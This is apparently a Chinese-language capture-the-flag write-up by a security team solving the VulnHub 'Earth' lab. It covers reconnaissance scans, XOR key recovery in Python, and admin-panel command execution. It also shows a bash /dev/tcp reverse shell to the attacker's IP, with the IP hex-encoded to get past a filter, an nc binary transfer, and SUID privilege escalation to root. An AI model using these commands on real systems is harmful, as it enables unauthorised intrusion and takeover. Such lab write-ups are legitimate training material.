Tide安全團隊 - Earth靶機滲透－鑽石舞台

Mar 12 Sat 2022 03:32
Tide安全團隊 - Earth靶機滲透

描述

難度：簡單

靶機上有兩個flag：一個用戶flag和一個包含 md5 哈希的root_flag。

環境準備

靶機獲取地址：

https://www.vulnhub.com/entry/the-planets-earth,755/

將下載好的靶機導入虛擬機

拓撲如下：

信息收集獲取IP地址

根據拓撲當前我們僅知道目標機與攻擊機處於同一網段下，但未知目標機ip，我們先使用二層探測目標機地址。獲取到目標機ip地址為192.168.183.131，如下圖所示。

netdiscover //二層主機探測arp-scan -l

獲取開放服務

對系統開放的服務進行探測,發現目標機開放了如下圖所示服務。

nmap -A -p 1-65535 192.168.183.131

訪問web服務，頁面報錯如下圖所示400錯誤

設置本地hosts文件DNS解析earth.local和terratest.earth.local

收集earth.local信息

訪問earth.local獲取到 Previous Messages:

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d403714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b452402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

使用dirb掃描http://earth.local/和http:s//earth.local/的目錄

dirb http://earth.localdirb https://earth.local

發現存在如下圖所示目錄

http://earth.local/admin

http://earth.local/cgi-bin

收集terratest.earth.local信息

訪問地址發現同earth.local相同頁面

使用dirb掃描http://terratest.earth.local和https://terratest.earth.local的目錄

dirb http://terratest.earth.localdirb https://terratest.earth.local

發現如下圖所示目錄，其中在https://terratest.earth.local中發現robots.txt文件

獲取testingnotes.txt提示信息

查看robots，在其中發現testingnotes.*

import requestsurl="https://terratest.earth.local/testingnotes"hz=[".asp", ".aspx", ".bat", ".c", ".cfm", ".cgi", ".com", ".dll", ".exe", ".htm", ".html", ".inc", ".jhtml",".jsa", ".json", ".jsp", ".log", ".mdb", ".nsf", ".php", ".phtml", ".pl", ".reg", ".sh", ".sql", ".txt",".xml"]for i in hz: payload=url+i res=requests.get(payload,verify=False) if res.status_code==200: print(payload+" exists")

嘗試robots中的後綴，遍歷出testingnotes為txt文件，訪問

https://terratest.earth.local/testingnotes.txt獲得如下信息。

測試安全消息傳遞系統注意事項: *使用XOR加密作為算法，應該是安全的使用RSA。*地球已經確認他們收到了我們發送的信息。使用*testdata.txt測試加密。*terra用作管理門戶的用戶名。待辦事項: *我們如何安全地將每月的鑰匙發送到地球? 或者我們應該每周更換鑰匙? *需要測試不同的密鑰長度，以防止暴力。鑰匙應該有多長? *需要改進消息界面和管理面板的界面，目前這是非常基本的。

使用的加密算法為XOR

testdata.txt是測試加密文件

用戶名terra

獲取testdata.txt

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

漏洞利用秘鑰破解

在收集的http://earth.local主頁信息中給出了三條Previous Messages字符串，經過對比最下面一條字符串位數與testdata.txt文本轉化為16進制後位數一致。使用Python進行異或解密如下：

import binasciidata1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()a = hex(int(data1,16) ^ int(f,16))print(a)al = []for i in range(2, len(a), 2): b = a[i:i+2] b = int(b, 16) c = chr(b) print(c,end='')

解密後的結果為

「earthclimatechangebad4humans」字符串的重複排列。

登錄後台

在testingnotes.txt中已知用戶名：terra，密碼為解密後的結果：

earthclimatechangebad4humans，嘗試登錄後台

登錄後台後，發現命令執行功能，直接搜索flag

find / -name "*flag*"

查看flag：

[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

提權反彈shell

kali監聽1234

nc -lvp 1234

靶機

bash -i >& /dev/tcp/192.168.183.128/1234 0>&1

發現遠程連接無響應嘗試ip轉換後連接

轉換ip為十六進制連接連接成功，查看權限為apache

bash -i >& /dev/tcp/0xc0.0xa8.0xb7.0x81/1234 0>&1

查找權限命令

查找有權限的命令：

find / -perm -u=s -type f 2>/dev/null

發現/usr/bin/reset_root

嘗試執行發現報錯

檢查復位觸發器是否存在… 復位失敗，所有觸發器不存在。

ltrace調試

使用ltrace /usr/bin/reset_root嘗試找錯，發現本地沒有ltrace命令

使用nc傳送到本地進行調試

nc -nlvp 9999 >reset_root

nc -w 192.168.183.129 9999 < /usr/bin/reset_root

報錯如下，發現沒有權限，賦權限777進行後發現缺少三個目錄

在靶機創建缺少的文件

touch/dev/shm/kHgTFI5G

touch/dev/shm/Zw7bV9U5

touch/tmp/kcM0Wewe

獲得權限查找flag

再次運行，reset_root獲得密碼

切換到root權限下查找flag

發現

/root/root_flag.txt

/var/earth_web/user_flag.txt

查看flag

關

於

我

們

Tide安全團隊正式成立於2019年1月，是新潮信息旗下以互聯網攻防技術研究為目標的安全團隊，團隊致力於分享高質量原創文章、開源安全工具、交流安全技術，研究方向覆蓋網絡攻防、系統安全、Web安全、移動終端、安全開發、物聯網/工控安全/AI安全等多個領域。

團隊作為「省級等保關鍵技術實驗室」先後與哈工大、齊魯銀行、聊城大學、交通學院等多個高校名企建立聯合技術實驗室。團隊公眾號自創建以來，共發布原創文章370餘篇，自研平台達到26個，目有15個平台已開源。此外積極參加各類線上、線下CTF比賽並取得了優異的成績。如有對安全行業感興趣的小夥伴可以踴躍加入或關注我們。